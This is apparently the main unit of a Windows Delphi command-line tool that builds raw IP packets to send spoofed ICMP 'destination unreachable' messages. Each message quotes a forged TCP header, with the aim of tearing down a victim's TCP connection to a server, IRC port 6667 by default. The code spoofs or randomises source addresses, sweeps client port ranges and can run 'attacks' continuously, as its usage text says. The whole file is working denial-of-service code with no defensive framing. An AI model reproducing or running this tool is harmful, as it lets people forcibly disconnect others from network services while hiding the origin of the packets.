unit MainUnit;

interface

uses
  Winsock2, SysUtils2, SocketHeaders;

type
  TPortType = (TClient, TServer);
  TSinOpt = packed record
    ClientPort1: Word;
    ClientPort2: Word;
    Delay: Cardinal;
    HedefAdres: TSockAddrIn;
    ICMPType: Byte;
    ICMPCode: Byte;
    Num: Cardinal;
    Sended: Cardinal;
    ServerIP: Cardinal;
    ServerPort1: Word;
    ServerPort2: Word;
    Socket: TSocket;
    SpoofIP: Cardinal;
  end;

var
  SinOpt: TSinOpt;

  function Gonder(s: TSocket; var Buf; len, flags: Integer; var addrto: TSockAddr; tolen: Integer): Integer;
  function Resolve(host: PChar): Cardinal;
  function ValidPort(S: string): Boolean;
  procedure CreateSocket;
  procedure SendSin(ClientPort, ServerPort: Word);
  procedure SendSin_FillICMPhdr(var ICMPhdr: PICMPhdr);
  procedure SendSin_FillIPhdr1(var IPhdr: PIPhdr);
  procedure SendSin_FillIPhdr2(var IPhdr: PIPhdr);
  procedure SendSin_FillTCPhdr(var TCPhdr: PTCPhdr; ClientPort, ServerPort: Word);
  procedure SetDefaultOptions;
  procedure SetParams;
  procedure SetPorts(PortType: TPortType; s: string);
  procedure Usage(s: string);

implementation

function Gonder(s: TSocket; var Buf; len, flags: Integer; var addrto: TSockAddr; tolen: Integer): Integer;
begin
  WSASetLastError(0);
  Result:=Sendto(s, Buf, len, flags, addrto, tolen);
  //if WSAGetLastError <> 0 then Writeln('Unable to send ICMP packet');
  WSACancelBlockingCall;
  WSAUnhookBlockingHook;
end;

function Resolve(host: PChar): Cardinal;
var
  InAddr: TInAddr;
  HostEnt: PHostEnt;
begin
  InAddr.S_addr:=inet_addr(host);
  if InAddr.S_addr = INADDR_NONE then begin
    HostEnt:=GetHostByName(host);
    if not Assigned(HostEnt) then begin
      Writeln('Error: Unable to resolve host: ' + host);
      Halt(0);
    end;
    Move((HostEnt^.h_addr_list^)^, InAddr.S_addr, HostEnt^.h_length);
  end;
  Result:=InAddr.S_addr;
end;

function ValidPort(S: string): Boolean;
begin
  Result:=(StrtoIntDef(S, -1) <> -1) and (StrtoIntDef(S, -1) > 0) and
          (StrtoIntDef(S, -1) < 65536); 
end;

procedure CreateSocket;
begin
  SinOpt.Socket:=Socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
  if SinOpt.Socket = INVALID_SOCKET then begin
    Writeln('Error on creating socket');
    Halt(0);
  end;
  if SetSockOpt(SinOpt.Socket, IPPROTO_IP, IP_HDRINCL, '1', Sizeof(PInteger)) <> 0 then begin
    Writeln('Error: IP_HDRINCL'#13#10 +
            '(Note that this program only works on Windows XP)');
    Halt(0);
  end;
end;

const
  Len = 56 + 36;
  
procedure SendSin(ClientPort, ServerPort: Word);
var
  Buffer: array [0..(Len - 1)] of Char;
  IPhdr1: PIPhdr;
  ICMPhdr: PICMPhdr;
  IPhdr2: PIPhdr;
  TCPhdr: PTCPhdr;
begin
  FillChar(Buffer[0], Sizeof(Buffer), 0);
  IPhdr1:=PIPhdr(@Buffer[0]);
  ICMPhdr:=PICMPhdr(@Buffer[20]);
  IPhdr2:=PIPhdr(@Buffer[28]);
  TCPhdr:=PTCPhdr(@Buffer[48]);
  SendSin_FillIPhdr1(IPhdr1);
  SendSin_FillICMPhdr(ICMPhdr);
  SendSin_FillIPhdr2(IPhdr2);
  SendSin_FillTCPhdr(TCPhdr, ClientPort, ServerPort);
  ICMPhdr.icmp_sum:=CheckSum(@ICMPhdr^, Len - 20);
  Gonder(SinOpt.Socket, Buffer[0], Len, 0, SinOpt.HedefAdres, Sizeof(SinOpt.HedefAdres));
end;

procedure SendSin_FillICMPhdr(var ICMPhdr: PICMPhdr);
begin
  Random;
  ICMPhdr.icmp_type:=SinOpt.ICMPType;
  ICMPhdr.icmp_code:=SinOpt.ICMPCode;
  ICMPhdr.icmp_id:=htons(Random(65535));
  ICMPhdr.icmp_seq:=htons(Random(65535));
end;

procedure SendSin_FillIPhdr1(var IPhdr: PIPhdr);
begin
  Random;
  IPhdr.ip_verlen:=$45;
  IPhdr.ip_tos:=0;
  IPhdr.ip_len:=htons(Len);
  IPhdr.ip_id:=Random(65535);
  IPhdr.ip_off:=0;
  IPhdr.ip_ttl:=128;
  IPhdr.ip_p:=1;
  IPhdr.ip_src:=SinOpt.SpoofIP;
  if SinOpt.SpoofIP = 0 then IPhdr.ip_src:=(Integer(Random(65535)) shl 16 ) + Random(65535);
  IPhdr.ip_dst:=SinOpt.HedefAdres.sin_addr.S_addr;
  IPhdr.ip_sum:=CheckSum(@IPhdr^, 20);
end;

procedure SendSin_FillIPhdr2(var IPhdr: PIPhdr);
begin
  IPhdr.ip_verlen:=$45;
  IPhdr.ip_len:=htons(69);
  IPhdr.ip_id:=ntohs(40216);
  IPhdr.ip_ttl:=10;
  IPhdr.ip_p:=6;
  IPhdr.ip_src:=SinOpt.HedefAdres.sin_addr.S_addr;
  IPhdr.ip_dst:=SinOpt.ServerIP;
end;

procedure SendSin_FillTCPhdr(var TCPhdr: PTCPhdr; ClientPort, ServerPort: Word);
begin
  TCPhdr.tcp_src:=htons(ClientPort);
  TCPhdr.tcp_dst:=htons(ServerPort);
  TCPhdr.tcp_seq:=1997;
  SinOpt.HedefAdres.sin_port:=TCPhdr.tcp_dst;
end;

procedure SetDefaultOptions;
begin
  SinOpt.HedefAdres.sin_addr.S_addr:=Resolve(PChar(ParamStr(1)));
  SinOpt.ServerIP:=Resolve(PChar(ParamStr(2)));
  SinOpt.ClientPort1:=1024;
  SinOpt.ClientPort2:=2000;
  SinOpt.Delay:=0;
  SinOpt.HedefAdres.sin_family:=AF_INET;
  SinOpt.ICMPType:=3;
  SinOpt.ICMPCode:=2;
  SinOpt.Num:=1;
  SinOpt.Sended:=0;
  SinOpt.ServerPort1:=6667;
  SinOpt.ServerPort2:=6667;
  SinOpt.SpoofIP:=0;
end;

procedure SetParams;
var
  i: integer;
  S: string;
  C: Char;
begin
  for i:=2 to ParamCount do begin
    S:=ParamStr(i);
    C:=#0;
    if Length(S) = 2 then if S[1] = '-' then C:=S[2];
    case C of
      'C' : SetPorts(TClient, ParamStr(i + 1));
      'S' : SetPorts(TServer, ParamStr(i + 1));
      't' : SinOpt.ICMPType:=StrtoIntDef(ParamStr(i + 1), 3);
      'c' : SinOpt.ICMPCode:=StrtoIntDef(ParamStr(i + 1), 2);
      's' : SinOpt.SpoofIP:=Resolve(PChar(ParamStr(i + 1)));
      'n' : SinOpt.Num:=StrtoIntDef(ParamStr(i + 1), 1);
      'd' : SinOpt.Delay:=StrtoIntDef(ParamStr(i + 1), 0);
    end;
  end;
end;

procedure SetPorts(PortType: TPortType; S: string);
  procedure ShowError;
  begin
    Writeln('Invalid port range: ' + S);
    Halt(0);
  end;
var
  Port: string;
  i: integer;
  Port1, Port2: string;
begin
  Port:=S;
  i:=Pos('-', Port);
  if i = 0 then ShowError;
  Port1:=Copy(Port, 1, i - 1);
  Delete(Port, 1, i);
  Port2:=Port;
  if not (ValidPort(Port1) and ValidPort(Port2)) then ShowError;
  case PortType of
    TClient:
      begin
        SinOpt.ClientPort1:=StrtoInt(Port1);
        SinOpt.ClientPort2:=StrtoInt(Port2);
      end;
    TServer:
      begin
        SinOpt.ServerPort1:=StrtoInt(Port1);
        SinOpt.ServerPort2:=StrtoInt(Port2);
      end;
  end;
end;

procedure Usage(s: string);
begin
  Write(
        'usage: ' + s + ' <client> <server> [options]'#13#10#13#10 +
        'Options:'#13#10 +
        '  -C:    Client port range (format: 1024-2000 (default))'#13#10 +
        '  -S:    Server port range (format: 6667-6667 (default))'#13#10 +
        '  -t:    ICMP type         (default 3)'#13#10 +
        '  -c:    ICMP code         (default 2)'#13#10 +
        '  -s:    Spoof host        (0 is random (default))'#13#10 +
        '  -n:    Num of attacks    (default 1) (0 is continuous)'#13#10 +
        '  -d:    Delay (in ms)     (default 0)'#13#10
       );
  Halt(0);
end;

end.
